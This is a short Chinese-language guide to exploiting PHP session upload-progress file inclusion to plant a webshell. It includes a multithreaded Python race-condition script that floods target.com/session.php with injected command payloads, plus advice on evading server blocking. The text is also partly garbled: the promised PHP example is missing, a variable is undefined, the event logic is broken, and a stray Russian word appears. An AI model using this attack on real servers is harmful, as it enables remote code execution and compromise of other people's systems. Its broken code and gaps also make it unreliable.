禁用自动清理会话文件：

• 修改php.ini，设置session.upload_progress.cleanup为0，这样在HTTP请求结束后不会自动删除会话文件。

编写注入木马：

• 创建一个简单的PHP脚本，利用PHP_SESSION_UPLOAD_PROGRESS参数注入恶意代码。例如：

• 将此脚本作为文件请求 отправ到目标服务器。

自动化发送请求：

• 使用Python编写脚本，利用多线程和事件来发送大量请求，提高攻击成功率。例如：

  import io
  import requests
  import threading
  import time
  sessid = 'dummy_session'
  data = {
      'cmd': 'system("echo hello;")'
  }
  global event
  event = threading.Event()
  def write_session():
      while True:
          f = io.BytesIO()
          requests.post(
              'http://target.com/session.php',
              data={'PHP_SESSION_UPLOAD_PROGRESS': raw_input_evil_code},
              files={'file': ('malicious.php', f)},
              cookies={'PHPSESSID': sessid}
          )
          time.sleep(0.5)
  def read_response():
      while True:
          try:
              response = requests.post(
                  'http://target.com/session.php?file=/some/path',
                  data=data,
                  cookies={'PHPSESSID': sessid}
              )
              if 'hello' in response.text:
                  print("Injection successful!")
                  event.clear()
              else:
                  print("Trying again...")
          except:
              print("Error, retrying...")
              time.sleep(1)
  with requests.Session() as session:
      for _ in range(100):
          threading.Thread(target=write_session).start()
      for _ in range(100):
          threading.Thread(target=read_response).start()
      event.wait()

处理异常并保持会话状态：

• 在多次尝试时，使用重试策略，如随机等待时间和指数重试，避免被服务器封锁。
• 使用global变量或类似机制管理事件，确保攻击未完成时不提前停止。

效果验证：

• 在目标服务器中查找新的会话文件。
• 在响应中查找注入代码的执行结果，如确认木马成功执行的日志或终端输出。